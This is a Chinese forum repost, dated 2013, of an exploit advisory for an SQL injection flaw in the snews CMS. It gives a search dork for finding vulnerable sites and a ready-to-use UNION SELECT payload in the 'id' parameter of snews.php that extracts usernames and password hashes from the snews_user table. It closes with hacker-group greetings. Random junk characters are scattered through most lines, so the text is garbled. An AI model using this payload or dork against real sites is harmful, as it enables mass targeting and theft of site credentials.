标题: CMS snews SQL Injection Vulnerability7 @& \, P" Y9 J( V) E
作者: By onestree( c& ` c, a& ^
下载地址 : http://snewscms.com/
" _# }7 i& G1 K+ ?& H! Q6 _2 _测试平台 : ubuntu 12.10 / win 7# W' [+ H4 j! k2 k. r
关键词: inurl:"tanyakan pada rumput yang bergoyang"
/ O" ?: ^/ P2 m* V7 u$ D. S- O
5 E2 J' Q" L" E- d! q% H9 y ( z0 T! [+ r* g% K0 B
*************************************************************6 s1 h- N0 k' [; A2 y3 q$ Y
9 F; i: `4 J# v& n2 f- l# }2 `( {SQL poc:
( r: H/ H2 I# O! y0 d8 k
& M4 |9 Q& f' t+ \ @% }! ^http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
2 o. z* ~) {8 a G: `& L* G9 P. J6 t3 Z+ m
示例6 v0 g/ u* m! M& S8 K/ u8 |
, V8 I$ C7 N5 S* r7 ~5 `) s phttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
g: ~9 t# I- `4 q6 d3 y- D2 v 2 y" |1 m4 _- E
: Q; B% l6 N, j; `, k5 t1 @9 G/ y
致谢:
8 v( p0 W+ ^6 B U# C2 B: z - Y9 {+ ]0 ]' t6 r, _+ t
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell7 c+ x% _: Y1 W% N8 a3 h8 E4 |
: ^; B y3 J4 F+ u4 F! J8 X! j indonesiancoder - moeslimh4x0r - go-coder9 _: A( }* K' D+ p; L* W. p
' n) `& C' r0 Cspesial my hunny :** d# L5 Z6 E0 @" r" K6 F/ G
|
发表于 2013-1-23 08:55:06
收藏
支持
反对